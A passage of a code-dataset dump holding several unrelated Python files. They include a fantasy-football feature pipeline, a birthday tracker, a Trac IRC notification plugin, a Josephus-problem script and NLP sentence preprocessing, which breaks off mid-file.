self.conn = conn\n\n if source == \"csv\":\n self._fetch_data_from_csv(path)\n elif source == \"db\":\n self._fetch_data_from_db(conn)\n else:\n raise ValueError(\"Please select source from either `csv` or `db`\")\n\n def get_dataset(self, target, mode=\"full\", binning=True,\n transformed=True):\n \"\"\"\n A function that help to split the dataset into k fold and\n train test dataset\n\n Args:\n df (pd.DataFrame) - The original data frame\n target (str) - The target column name\n mode (str) - Either `full`, `split`.\n `full` means returning the whole transformed DataFrame\n in the class\n\n `split` means returning the train test split dataframe\n This will return a tuple of (train, eval, test)\n transformed (boolean) - Return transformed dataset if True\n\n Return:\n pd.DataFrame or tuple(X_train (pd.DataFrame), X_eval(pd.DataFrame),\n y_train(pd.DataFrame), y_eval (pd.DataFrame),\n X_test (pd.DataFrame), y_test (pd.DataFrame))\n\n \"\"\"\n\n if binning:\n target = target + \"_binned\"\n\n if mode == \"full\":\n if transformed:\n return self.transformed_dataset\n else:\n return self.dataset\n\n elif mode == \"split\":\n\n if transformed:\n _ds = self.transformed_dataset\n else:\n _ds = self.dataset\n\n _train = _ds[_ds[\"game_year\"] != 1819].copy()\n _test = _ds[_ds[\"game_year\"] == 1819].copy()\n\n _train.drop(\"game_year\", axis=1, inplace=True)\n _test.drop(\"game_year\", axis=1, inplace=True)\n\n # Apply train_test_split on train\n X_train, X_eval, y_train, y_eval = \\\n train_test_split(_train.drop(target, axis=1),\n _train[target].values,\n test_size=0.33,\n random_state=42)\n\n X_test = _test.drop(target, axis=1)\n y_test = _test[target].values.reshape(-1, 1)\n\n print(\"Transformed number of feature columns: %s\"\n % len(X_train.columns))\n print(X_train.columns)\n\n return (X_train, y_train, X_eval, y_eval, X_test, y_test)\n\n elif mode == \"kfold\":\n pass\n\n else:\n raise ValueError(\"Please choose either `full`, `split` or `kfold`\")\n\n def get_players(self):\n return self.players\n\n def _fetch_data_from_db(self, conn):\n pass\n\n def _fetch_data_from_csv(self, path, return_as_pd=True):\n \"\"\"\n A function to fetch data from complete csv\n\n Args:\n path (str or pathlib.path): The path of the complete csv file.\n The complete csv file is a fact table\n file that contains all the game records\n\n Returns:\n pandas.DataFrame: Return a dataframe that is clean and ready for\n training\n\n \"\"\"\n\n if type(path) is PosixPath or type(path) is WindowsPath:\n path = str(path/'complete_merged.csv')\n else:\n raise TypeError(\"Path is not a PosixPath/WindowsPath\")\n\n self.dataset = pd.read_csv(path, encoding=\"ISO-8859-1\")\n\n # self.dataset, self.dropped_columns = \\\n # self._construct_player_ts_featureset(df, self.window)\n\n self.transformed_dataset = self._transform_dataset(\n self.dataset,\n target_name=\"total_points\",\n return_as_pd=True)\n\n print(\"Feature engineering done. \")\n\n print(\"Extracting the players information...\", end=\"\")\n\n if return_as_pd:\n print(\"Original number of feature columns: %s\"\n % len(self.dataset.columns))\n print(self.dataset.columns)\n else:\n print(\"Shape of dataset: %s\" % self.dataset.shape)\n\n # def _construct_player_ts_featureset(self, df, window):\n # \"\"\"\n # A function that group the long time series dataframe with all players\n # into a feature set that has the players as primary keys.\n #\n # Args:\n # df (pd.Dataframe) - A long dataframe that each row of record\n # represents the observation metrics\n # and the respective score of each player\n # at his respective game week.\n #\n # window (int) - The game week window size of the features.\n # For example, 10 means 10 weeks of metrics\n # will be used as features\n # Returns:\n # pandas.DataFrame: A cleaned dataframe with rolling averages\n #\n # \"\"\"\n #\n # # Make sure the dataframe is in the right order\n # # df = pd.read_csv(\"./data/complete.csv\", encoding=\"ISO-8859-1\")\n # df = (df.sort_values([\"code\", \"game_year\", \"round\"])\n # .reset_index(drop=True))\n #\n # columns_to_drop = [\"id\", \"kickoff_time\", \"kickoff_time_formatted\",\n # \"element\", \"loaned_in\", \"loaned_out\",\n # \"opponent_team\", \"round\", \"fixture\", \"was_home\",\n # \"ea_index\", \"game_year\", \"id_of_year\", \"name\",\n # \"lower_name\", \"NextFixture1\", \"Team\", \"PositionsList\"]\n #\n # columns_dropped_slice = df[columns_to_drop]\n # subset_df = df.drop(columns_to_drop, axis=1)\n # rolling_mean_features = (subset_df\n # .groupby(\"code\")\n # .rolling(window, min_periods=1)\n # .agg(\"mean\"))\n # rolling_mean_features_pct_change = \\\n # (subset_df\n # .groupby(\"code\")[\"transfers_balance\",\n # \"value\"]\n # .diff(window-1)\n # .rename(\n # columns={\n # \"transfers_balance\": \"transfer_balance_growth\",\n # \"value\": \"value_growth\"\n # }, index=str)\n # .reset_index(drop=True))\n #\n # rolling_mean_features = rolling_mean_features.reset_index(drop=True)\n #\n # rolling_mean_features = pd.concat([rolling_mean_features,\n # rolling_mean_features_pct_change],\n # axis=1)\n #\n # rolling_mean_features['transfer_balance_growth'] = \\\n # (rolling_mean_features[\"transfer_balance_growth\"]\n # .replace(np.inf, 0)\n # .replace(-np.inf, 0))\n #\n # rolling_mean_features['value_growth'] = \\\n # (rolling_mean_features[\"value_growth\"]\n # .replace(np.inf, 0)\n # .replace(-np.inf, 0))\n #\n # # Adding new features on the next game\n # rolling_mean_features[\"next_home\"] = \\\n # df.groupby([\"code\"])[\"was_home\"].shift(-1)\n #\n # rolling_mean_features[\"NextFixture1\"] = \\\n # df.groupby([\"code\"])[\"NextFixture1\"].shift(-2)\n #\n # rolling_mean_features[\"next_round\"] = \\\n # df.groupby([\"code\"])[\"round\"].shift(-1)\n #\n # rolling_mean_features[\"target\"] = \\\n # df.groupby([\"code\"])[\"total_points\"].shift(-1)\n #\n # rolling_mean_features[\"game_year\"] = \\\n # df.groupby([\"code\"])[\"game_year\"].shift(-1)\n #\n # rolling_mean_features[\"team\"] = \\\n # df.groupby([\"code\"])[\"Team\"].shift(-1)\n #\n # rolling_mean_features[\"position\"] = \\\n # df.groupby([\"code\"])[\"PositionsList\"].shift(-1)\n #\n # # Then subset only the window size + rows from each group\n # rolling_mean_features = (rolling_mean_features\n # .groupby(\"code\", group_keys=False)\n # .apply(lambda x: x.iloc[window-1:-1]))\n #\n # rolling_mean_features = rolling_mean_features.dropna()\n #\n # return rolling_mean_features, columns_dropped_slice\n\n def _construct_player_base_dataset(self, df):\n \"\"\"\n Extract the base/lifetime information of a player to support the\n time series prediction\n \"\"\"\n df = pd.read_csv(\"./data/complete_merged.csv\", encoding=\"ISO-8859-1\")\n self.players = (df.groupby([\"code\", \"name\"],\n group_keys=False, as_index=False)\n .count())[[\"code\", \"name\"]]\n\n def _transform_dataset(self, df, target_name, return_as_pd=False):\n \"\"\"\n Dataset transformation Function\n\n Args:\n df (pandas.Dataframe) - Original dataset\n\n Return:\n pandas.DataFrame - A transformed dataset\n \"\"\"\n\n print(\"Performing one hot encoding...\")\n # df['next_opponent'] = df.next_opponent.astype('int').astype('object')\n categorical_onehot = pd.get_dummies(df.select_dtypes('object'))\n # categorical_onehot.drop(\"next_home_False\", axis=1, inplace=True)\n # categorical_onehot.drop(\"NextFixture1_Wolverhampton\", axis=1, inplace=True)\n # categorical_onehot.drop(\"PositionsList_MID\", axis=1, inplace=True)\n # categorical_onehot.drop(\"Team_\", axis=1, inplace=True)\n # categorical_onehot.drop(\"next_opponent_20\", axis=1, inplace=True)\n\n print(categorical_onehot.columns)\n\n df.drop([\"NextFixture1\",\n \"Team\",\n \"PositionsList\"], axis=1, inplace=True)\n df = pd.concat([df, categorical_onehot], axis=1)\n\n # Split the data into target and features\n target = df[target_name].values\n print(\"target: \", target)\n features = df.drop(target_name, axis=1)\n feature_names = features.columns\n\n feature_pipeline = Pipeline([\n ('features',\n FeatureUnion(n_jobs=-1, transformer_list=[\n ('numericals', Pipeline([\n ('selector', ut.TypeSelector('float')),\n ('scaler', StandardScaler())\n ])),\n ('others', Pipeline([\n ('selector', ut.TypeSelector('uint8'))]))\n ]))\n ])\n\n target_pipeline = Pipeline([\n ('addbase',\n FunctionTransformer(lambda x: x + 3)),\n ('log', FunctionTransformer(np.sqrt))\n ])\n\n transformed_features = feature_pipeline.fit_transform(features)\n # transformed_target = (target_pipeline\n # .fit_transform(target.reshape(-1, 1)))\n\n target_binned = self._bin_target(target)\n target_binned = target_binned.astype(\"category\").codes\n\n print(transformed_features.shape)\n print(len(feature_names))\n\n if return_as_pd:\n transformed_df = pd.DataFrame(features)\n transformed_df.columns = feature_names\n # transformed_df[\"target\"] = transformed_target\n # Add Target binning for the non-zeros\n transformed_df[\"target_binned\"] = target_binned\n\n return transformed_df\n else:\n transformed_data = np.append(transformed_features,\n target_binned,\n axis=1)\n return transformed_data\n\n def _bin_target(self, target):\n \"\"\"\n A binning function to bin the target\n \"\"\"\n print(target)\n bin_ranges = [-np.Inf, 0, 1, 3, 5, 8, np.Inf]\n bin_labels = [\"0\", \"0-1\", \"1-3\", \"3-5\", \"5-8\", \"8+\"]\n\n target_binned = pd.cut(target, bins=bin_ranges, labels=bin_labels)\n print(\"target_binned: \", target_binned.value_counts())\n\n return target_binned\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":13214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"654112533","text":"\n#\n# This is a birthday tracker for some set of\n# people - and a small piece of i/o. We will\n# list the poeple for the user, and the user\n# will choose a person and we will display\n# their birthday... and that's it! \n#\n\nclass box:\n\tdef __init__(self, birthday, fname, lname):\n\t\tself.birthday = birthday\n\t\tself.fname = fname\n\t\tself.lname = lname\n\n\tdef getBirthday(self):\n\t\treturn self.birthday\n\n\tdef getFName(self):\n\t\treturn self.fname\n\n\tdef getLName(self):\n\t\treturn self.lname\t\n\n\tdef setLName(self, lname):\n\t\tself.lname = lname\n\n\tdef setFName(self, fname):\n\t\tself.fname = fname\n\n\tdef setBirthday(self, bday):\n\t\tself.birthday = bday\n\nbirthdayBox = []\nnames = [{'fname':'Joey', 'lname':'Uberman', 'birthday':'03/30/58'},\n{'fname':'Madge', 'lname':'Hinterspall', 'birthday':'05/19/72'},\n{'fname':'Irving', 'lname':'Dagall', 'birthday':'09/12/1924'}]\n\ndef fillData():\n\tfor i in range(3):\n\t\tfname = input(\"Enter first name: (enter for default) \")\n\t\tif len(fname) < 3:\n\t\t\tfname = names[i]['fname']\n\t\t\tlname = names[i]['lname']\n\t\t\tbirthday = names[i]['birthday']\n\t\telse:\n\t\t\tlname = input(\"Enter last name: \")\n\t\t\tbirthday = input(\"Enter birthday: \")\n\n\t\tb = box(birthday, fname, lname)\n\t\tbirthdayBox.append(b)\n\ndef showData():\n\tfor i in range(len(birthdayBox)):\n\t\tprint(\"Person: \" + birthdayBox[i].fname + \" \" + birthdayBox[i].lname)\n\ndef getName():\n\tname = input(\"Enter the name you want to lookup: \")\n\tn = name.split(' ')\n\treturn getBirthday(n)\n\ndef getBirthday(name):\n\tif(len(name)) < 2:\n\t\tfname = name[0]\n\telse:\n\t\tfname = name[0]\n\t\tlname = name[1]\n\n\tfound = False\n\tfor n in birthdayBox:\n\t\tif n.fname == fname:\n\t\t\treturn n.birthday\n\tfor n in birthdayBox:\n\t\tif n.lname == lname:\n\t\t\treturn n.birthday\n\n\t\t\nfillData()\nshowData()\t\t\nprint(getName())\n\n\n","sub_path":"python/Projects/proj6/bday.py","file_name":"bday.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"40906950","text":"## weight of widgets and gizmos\n\nw_gizmo = 112\nw_widget = 75\n\nwidget_no = float(input(\"How many widgets would you like to order:\"))\ngizmo_no = float(input(\"How many gizmos would you like to order: \"))\n\nweight = (w_gizmo*gizmo_no) + (w_widget*widget_no)\n\nprint(\"Total weight of order: %.2f g\" %weight)\n","sub_path":"1 Intro excercises (math operators)/Ex_8.py","file_name":"Ex_8.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"355632233","text":"\r\n\r\ncars = [] #所有车辆列表\r\nustomers = [] #所有客户列表\r\ndef __load_cars():#加载所有车辆信息\r\n try:\r\n f1 = open('vehicle_information.txt',encoding='utf-8')\r\n try:\r\n while True:\r\n lin1 = f1.readline() #每次取一行信息\r\n if not lin1: #到达文件尾\r\n break\r\n lst =lin1.strip()\r\n s = lst.split(',')\r\n car_id = s[0]\r\n name= s[1]\r\n is_lend = s[2]\r\n price = s[3]\r\n time1 = s[4]\r\n time2 = s[5]\r\n dict = {'car_id':car_id,'name':name,\r\n 'is_lend':is_lend,'price':price,\r\n 'start_date':time1,'end_date':time2}\r\n cars.append(dict)\r\n print(\"加载车辆信息成功\")\r\n except:\r\n f1.close()\r\n except OSError:\r\n print(\"加载车辆信息失败\")\r\n finally:\r\n f1.close()\r\n\r\n\r\n","sub_path":"python/dazhewan/day19/homework/lianxi.py","file_name":"lianxi.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"620400144","text":"m, n = [int(t) for t in raw_input().split(' ')]\nnums = [int(t) for t in raw_input().split(' ')]\nd = {}\nfor i, v in enumerate(nums):\n\tif(v in d):\n\t\tif(d[v][-1][1] == i):\n\t\t\td[v][-1][1] = i + 1\n\t\telse:\n\t\t\td[v].append([i + 1, i + 1])\n\telse:\n\t\td[v] = [[i + 1, i + 1], ]\n\n# print(d)\nfor i in range(n):\n\tl, r, v = [int(t) for t in raw_input().split(' ')]\n\n\tif(v in d):\n\t\tstart, end = 0, len(d[v]) - 1\n\t\tmiddle = (start + end) // 2\n\n\t\twhile(start < end):\n\t\t\tmiddle = (start + end) // 2\n\t\t\t# print(start, middle, end)\n\t\t\tif(d[v][middle][0] <= l <= d[v][middle][1]):\n\t\t\t\tbreak\n\t\t\telif(d[v][middle][0] > l):\n\t\t\t\tend = middle - 1\n\t\t\telse:\n\t\t\t\tstart = middle + 1\n\t\t\n\t\tif(d[v][start][0] <= l <= d[v][start][1]):\n\t\t\tmiddle = start\n\n\t\tif(d[v][middle][0] <= l <= d[v][middle][1]):\n\t\t\tif(d[v][middle][1] < r):\n\t\t\t\tprint(d[v][middle][1] + 1)\n\t\t\telse:\n\t\t\t\tprint(-1)\n\t\telse:\n\t\t\tprint(l)\n\telse:\n\t\tprint(l)","sub_path":"online_judge/codeforces/622, Educational Codeforces Round 7/C. Not Equal on a Segment.py","file_name":"C. Not Equal on a Segment.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"117336140","text":"# _*_ coding:utf-8 _*_\n\nimport copy\nfrom Binary import to_object\nfrom BinaryReader import BinaryReader\n\nclass MessageCenter:\n __instance = None\n\n @staticmethod\n def get_instance():\n if None is MessageCenter.__instance:\n MessageCenter.__instance = MessageCenter()\n return MessageCenter.__instance\n\n def __init__(self):\n self.__message_callback = dict()\n self.__message_type = dict()\n\n def register(self, inst, call_back):\n self.__message_callback[inst.MID] = call_back\n self.__message_type[inst.MID] = inst\n\n def process(self, binary_reader):\n inst = None\n mid = binary_reader.read_next()\n # 复制原型\n if self.__message_type.has_key(mid):\n inst_prototype = self.__message_type[mid]\n version = binary_reader.read_string()\n # 检查版本号\n if str(inst_prototype.get_version()) != version:\n print(\"error: The version number is not equal\")\n return\n inst = copy.deepcopy(inst_prototype)\n to_object(binary_reader, inst)\n # 根据MID获取回调\n if None is not inst:\n if not self.__message_callback.has_key(mid):\n print(\"error: Without the message callback methods\")\n return\n message_callBack = self.__message_callback[mid]\n message_callBack(inst)\n\n","sub_path":"Sloth/MessageCenter.py","file_name":"MessageCenter.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"260375601","text":"from django.urls import path\nfrom .import views\n\n\nurlpatterns = [\n path(\"\", views.student, name=\"student\"),\n path(\"ranklist/\", views.ranklist, name=\"ranklist\"),\n path(\"performance//\", views.performance, name=\"performance\"),\n path(\"notification/\", views.view_notification, name=\"view_notification\"),\n path(\"addExam/\", views.add_exam, name=\"add_exam\"),\n path(\"showStudent//\", views.show_student, name=\"show_student\"),\n path(\"addStudent/\", views.add_student, name=\"add_student\"),\n path(\"updateStudent//\", views.update_student, name=\"update_student\"),\n path('delete//', views.delete_data, name=\"deletedata\"),\n path('delete_notification//',\n views.delete_notification, name=\"delete_notification\"),\n path('/addResult', views.add_result, name=\"add_result\"),\n]\n","sub_path":"student/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"358469848","text":"#-*-coding:utf-8 -*\nimport os # on importe le module os\n\nchaine = input(\"Tapez le titre en minuscules : \")\nchaine = chaine.upper().center(50)\nprint (chaine)\n\nwhile chaine.lower() != \"q\":\n\tprint(\"Tapez 'Q' pour quitter...\")\n\tchaine = input()\nprint(\"Merci !\")\n\nos.system(\"pause\")","sub_path":"Partie_2/3.mef.py","file_name":"3.mef.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"339168637","text":"# -*- coding: utf-8 -*-\r\n#\r\n# Copyright (C) 2017 Miklos Molnar\r\n#\r\n# All rights reserved.\r\n#\r\n# This software is licensed as described in the file README.md, which\r\n# you should have received as part of this distribution.\r\n\r\nfrom trac.core import Component, implements\r\nfrom trac.notification.api import (\r\n NotificationEvent, NotificationSystem, INotificationFormatter)\r\nfrom trac.web.api import IRequestFilter, ITemplateStreamFilter\r\nfrom trac.web.chrome import add_notice\r\nfrom trac.wiki.api import IWikiChangeListener\r\nfrom trac.util.translation import _\r\n\r\nfrom genshi.builder import tag\r\nfrom genshi.filters.transform import Transformer\r\nfrom genshi.input import HTML\r\nfrom genshi.output import HTMLSerializer\r\n\r\nfrom subscription import SubscriptionHandler\r\n\r\n\r\n# ==================== Notification events ====================\r\nclass WikiPageChangeEvent(NotificationEvent):\r\n \"\"\"Represent a wiki page change `NotificationEvent`.\"\"\"\r\n\r\n def __init__(self, category, target, time, author, comment=None,\r\n changes=None):\r\n super(WikiPageChangeEvent, self).__init__('wikipage', category, target,\r\n time, author)\r\n self.comment = comment\r\n self.changes = changes or {}\r\n\r\n\r\n# ==================== Notification formatters ====================\r\nclass ShortIrcNotificationFormatter(Component):\r\n\r\n implements(INotificationFormatter)\r\n\r\n # Supported styles\r\n support_styles = [('text/irc', 'ticket'), ('text/irc', 'wikipage')]\r\n\r\n # INotificationFormatter methods\r\n def get_supported_styles(self, transport):\r\n if transport == 'irc':\r\n for style in self.support_styles:\r\n yield style\r\n\r\n def format(self, transport, style, event):\r\n if transport != 'irc':\r\n return ''\r\n\r\n comment = self.smart_truncate(event.comment)\r\n if event.realm == 'ticket':\r\n return \"Ticket #{0} | {1} by {2} | Comment: {3} | {4}\" \\\r\n .format(event.target.id, event.category, event.author,\r\n comment, self.env.abs_href.ticket(event.target.id))\r\n if event.realm == 'wikipage':\r\n return \"Page '{0}' | {1} by {2} | Comment: {3} | {4}\" \\\r\n .format(event.target.name, event.category, event.author,\r\n comment, self.env.abs_href.wiki(event.target.name))\r\n return ''\r\n\r\n # helper functions\r\n def smart_truncate(self, content, length=80, suffix='...'):\r\n if len(content) <= length:\r\n return content\r\n else:\r\n return ' '.join(content[:length + 1].split(' ')[0:-1]) + suffix\r\n\r\n\r\n# ==================== Notification plugin ====================\r\nclass IrkerNotifcationPlugin(Component):\r\n implements(IWikiChangeListener, ITemplateStreamFilter, IRequestFilter)\r\n MODULE_NAME = 'irker_plugin'\r\n\r\n # IRequestFilter methods\r\n def pre_process_request(self, req, handler):\r\n \"\"\"Handles requests containing subscription related actions\r\n like subscribe and unsubscribe.\"\"\"\r\n if not req.session.authenticated:\r\n return handler\r\n if req.method == 'GET' and 'subscribe' in req.args:\r\n if req.args.get('subscribe') == 'Subscribe':\r\n if not SubscriptionHandler. \\\r\n is_session_subscribed_for_ticket_changes(\r\n self.env, req.session.sid):\r\n SubscriptionHandler.add_subscription(\r\n self.env, self.log, req.session.sid,\r\n 'ResourceChangeIrcSubscriber')\r\n prev_subs = req.session.get('subscriptions', '')\r\n if len(prev_subs) == 0:\r\n req.session['subscriptions'] = req.path_info\r\n else:\r\n req.session['subscriptions'] = \\\r\n req.session['subscriptions'] + ', %s' % req.path_info\r\n req.session.save()\r\n add_notice(req, _('You have subscribed successfully!'))\r\n else:\r\n updated_subscriptions = \\\r\n [x.strip() for x in req.session['subscriptions'].\r\n split(',') if not x.strip() == req.path_info]\r\n req.session['subscriptions'] = ', '.join(updated_subscriptions)\r\n req.session.save()\r\n add_notice(req, _('You have unsubscribed successfully!'))\r\n return handler\r\n\r\n def post_process_request(self, req, template, data, content_type):\r\n return template, data, content_type\r\n\r\n # ITemplateStreamFilter methods\r\n def filter_stream(self, req, method, filename, stream, data):\r\n \"\"\"Returns a transformed stream extended with irc subscribe button.\"\"\"\r\n if not req.session.authenticated:\r\n return stream\r\n\r\n # Applying changes on ticket.html\r\n if filename == 'ticket.html':\r\n stream = stream | Transformer(\r\n 'body//div[@class=\"trac-content \"]').\\\r\n prepend(HTML(self._get_button_html(req)))\r\n self.log.debug('#IrkerNotifcationPlugin filter_stream')\r\n\r\n if filename == 'wiki_view.html':\r\n stream = stream | Transformer(\r\n 'body//div[@id=\"wikipage\"]').\\\r\n prepend(HTML(self._get_button_html(req)))\r\n self.log.debug('#IrkerNotifcationPlugin filter_stream')\r\n return stream\r\n\r\n def wiki_emit_event(self, page, action, time, author):\r\n event = WikiPageChangeEvent(action, page, time, author, page.comment)\r\n try:\r\n NotificationSystem(self.env).notify(event)\r\n except Exception as e:\r\n self.log.error(\"Failure sending notification when wiki page\"\r\n \" '%s' has changed: %s \",\r\n page.name, exception_to_unicode(e))\r\n\r\n def wiki_page_added(self, page):\r\n self.wiki_emit_event(page, 'added', None, page.author)\r\n\r\n def wiki_page_changed(self, page, version, t, comment, author, ipnr):\r\n self.wiki_emit_event(page, 'changed', t, page.author)\r\n\r\n def wiki_page_deleted(self, page):\r\n self.wiki_emit_event(page, 'deleted', None, '')\r\n\r\n def wiki_page_version_deleted(self, page):\r\n self.wiki_emit_event(page, 'version_deleted', None, '')\r\n\r\n # helper functions\r\n def _get_button_html(self, req):\r\n \"\"\"The construction of subscribe button.\"\"\"\r\n # TODO replace with genshi builder\r\n button = u''''''\r\n if SubscriptionHandler.\\\r\n is_session_subscribed_to(self.env, req.session.sid,\r\n req.path_info):\r\n button = button % (_('Unsubscribe'), _(\r\n 'Unsubscribe from IRC notifications'))\r\n else:\r\n button = button % (_('Subscribe'), _(\r\n 'Subscribe to IRC notifications'))\r\n\r\n return u'''\r\n
\r\n
\r\n %s\r\n
\r\n
\r\n ''' % (req.href + req.path_info, button)\r\n","sub_path":"irker_notification/notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":7247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"617141822","text":"\"\"\"\r\n《幸运的基督徒》\r\n有15个基督徒和15个非基督徒在海上遇险\r\n,为了能让一部分人活下来不得不将其中\r\n15个人扔到海里面去,有个人想了个办法\r\n就是大家围成一个圈,由某个人开始从1报数,\r\n报到9的人就扔到海里面,他后面的人接着从\r\n1开始报数,报到9的人继续扔到海里面,直到\r\n扔掉15个人。由于上帝的保佑,15个基督徒都\r\n幸免于难,问这些人最开始是怎么站的,哪\r\n些位置是基督徒哪些位置是非基督徒。\r\n\"\"\" \r\ndef main():\r\n\tpersons = [0]*30\r\n\tcounter,index,number=0,0,0\r\n\twhile counter <15 :\r\n\t\tif persons[index] == 0:\r\n\t\t\tnumber += 1\r\n\t\t\tif number == 9:\r\n\t\t\t\tpersons[index] = 1\r\n\t\t\t\tcounter += 1\r\n\t\t\t\tnumber = 0\r\n\t\tindex += 1\r\n\t\tindex %= 30\r\n\tfor person in persons:\r\n\t\tif person == 0:\r\n\t\t\tprint('基督 ',end=\"\")\r\n\t\telse:\r\n\t\t\tprint('非基督 ',end=\"\")\r\n\t\t\t\t\t\t\r\nif __name__ == '__main__':\r\n main()","sub_path":"约瑟夫问题.py","file_name":"约瑟夫问题.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"3564306","text":"import nltk\nfrom stanfordcorenlp import StanfordCoreNLP\n\nnltk.download('wordnet')\n\ndef sentence_preprocess(_sentence):\n\n # Change sentence to lower_case except slack code(<@ABCDEFGHI>) and file name(File.py)\n punc_list = [\"!\", \"?\", \",\", \".\", \"’\"]\n\n # Please preserve the order of elements in replace_list.\n replace_list = [(\" please \", \" \"), (\" hey \", \" \"), (\" i think \", \" \"),\n (\" can't \", \" can not \"), (\" won't \", \" will not \"), (\"n't \", \" not \"),\n (\" do not have to \", \" should not \"),\n (\" have to \", \" should \"), (\" ought to \", \" should \"), (\" ought not to \", \" should not \"),\n (\" got to \", \" should \"), (\" gotta \", \" should \"),\n (\" wanna \", \" want to \"),\n (\"'m \", \" am \"), (\"'ve \", \" have \"), (\"'re \", \" are \"),\n (\" where's \", \" where is \"), (\" what's \", \" what is \"), (\" who's \", \" who is \"), (\" how's \", \" how is \"), (\" why's \", \" why is \"),\n (\" the \", \" \"), (\" a \", \" \"), (\" an \", \" \")]\n # can't -> can not, won't -> will not\n # shouldn't -> should not, wouldn't -> would not, couldn't -> could not , don't -> do not, haven't -> have not\n\n sentence = _sentence.lstrip(\"!,.? \").lower()\n\n for punc in punc_list:\n if punc == \"’\":\n sentence = sentence.replace(punc, \"'\")\n if punc != \".\":\n sentence = sentence.replace(punc, \" \" + punc + \" \")\n\n sentence = \" \" + sentence + \" \"\n\n for replace_tag in replace_list:\n sentence = sentence.replace(replace_tag[0], replace_tag[1])\n\n # Exception handling : Sentence with Sayme (ex : Sayme,.!? Sayme,?.! Could you help me?)\n # Extract all of \"sayme\", if the verb doesn't follow \"sayme\"\n sentence = sentence.lstrip(\"!.,? \")\n if sentence.startswith(\"sayme\"):\n without_sayme_st = sentence.replace(\"sayme\",\"\").lstrip()\n count = 0\n for punc in punc_list:\n if not without_sayme_st.startswith(punc) and punc != \"’\":\n count = count + 1\n if count != 4:\n sentence = without_sayme_st.lstrip(\"!?,. \")\n\n word_list = sentence.split()\n for word in word_list:\n word_idx = word_list.index(word)\n if word.find(\"<@\") != -1 and word[word.find(\"<@\") + 11] == \">\":\n modified_word = word.upper()\n elif \".py\" in word or \".md\" in word or \".txt\" in word or \".json\" in word:\n file_idx = _sentence.lower().find(word)\n modified_word = _sentence[file_idx:file_idx + len(word)]\n else:\n if word == \"i\":\n modified_word = word[0].upper() + word[1:]\n elif word == \"sayme\":\n modified_word = \"you\"\n else:\n modified_word = word.replace(\".\", \" .\") #for detecting word\n word_list[word_idx] = modified_word\n\n sentence = ' '.join(word_list)\n sentence = sentence.strip()\n sentence = \" \" + sentence + \" \"\n\n return sentence\n\ndef is_question(_sentence, pos_tag_list, nlp):\n sentence = (_sentence.rstrip(\" .,!?\") + \" / ?\").replace(\" not \", \" \", 1)\n print(sentence)\n parse_list = nlp.parse(sentence)\n print(\"parse_list\", parse_list)\n if (\"SBARQ\" in parse_list or \"SQ\" in parse_list) and pos_tag_list[0][1] != \"VB\":\n return True\n else:\n for pos_tag in pos_tag_list:\n if pos_tag[0] == \"how\" or pos_tag[0] == \"what\":\n pos_idx = pos_tag_list.index((pos_tag[0], pos_tag[1]))\n if pos_tag_list[pos_idx + 1][0] == \"about\":\n return True\n return False\n\ndef is_command(_sentence, nlp):\n # sentence 제일 앞에 modal 추가\n sentence = \"Must \" + _sentence\n pos_tag_list = nlp.pos_tag(sentence)\n\n for pos_tag in pos_tag_list:\n if pos_tag[1] == \"RB\" or pos_tag[1] == \"MD\":\n pass\n elif (pos_tag[1] == \"VB\" and pos_tag[0] != \"sayme\") or pos_tag[1] == \"VBP\":\n return True\n else:\n return False\n\n\ndef is_suggestion(pos_tag_list):\n suggestion_noun_list = [\"you\", \"sayme\"]\n for pos_tag in pos_tag_list:\n if pos_tag[0] in suggestion_noun_list:\n pass\n elif pos_tag[1] == \"MD\":\n return True\n else:\n return False\n\ndef is_desire(pos_tag_list):\n ignore_pos_list = [\"RB\", \",\", \"!\", \".\"]\n VPN_list = [\"do\", \"am\", \"are\", \"is\", \"be\"]\n desire_list = [\"want\", \"hope\", \"wish\", \"desire\", \"need\", \"like\", \"love\"]\n wonder_list = [\"wonder\", \"curious\", \"aware\", \"conscious\", \"inquisitive\", \"interested\", \"questioning\", \"searching\"]\n\n\n for pos_tag in pos_tag_list: # I should get @Sun's working status.\n # if pos_tag[0] == \"I\" or pos_tag[1] in ignore_pos_list:\n # pass\n # elif pos_tag[0] in VPN_list and pos_tag[1] == \"VBP\":\n # pass\n # elif pos_tag[1] == \"MD\" or pos_tag[0] in desire_list or pos_tag[0] in wonder_list:\n # return True\n # else:\n # return False\n if pos_tag[1] in ignore_pos_list:\n pass\n elif pos_tag[0] == \"I\":\n return True\n else:\n return False\n\ndef require_something_sentence(_sentence):\n nlp = StanfordCoreNLP('http://localhost', port=9000)\n sentence = sentence_preprocess(_sentence)\n pos_tag_list = nlp.pos_tag(sentence)\n\n lemmatizer = nltk.WordNetLemmatizer()\n for pos_tag in pos_tag_list:\n if pos_tag[1] == \"VB\" or pos_tag[1] == \"VBP\" or pos_tag[1] == \"VBG\":\n org_wrd = lemmatizer.lemmatize(pos_tag[0], pos =\"v\")\n sentence = sentence.replace(\" \" + pos_tag[0] + \" \", \" \" + org_wrd + \" \")\n\n print(\"sentence\", sentence)\n print(\"pos_tag_list\", pos_tag_list)\n\n if is_question(sentence, pos_tag_list, nlp):\n for pos_tag in pos_tag_list:\n if pos_tag[1] == 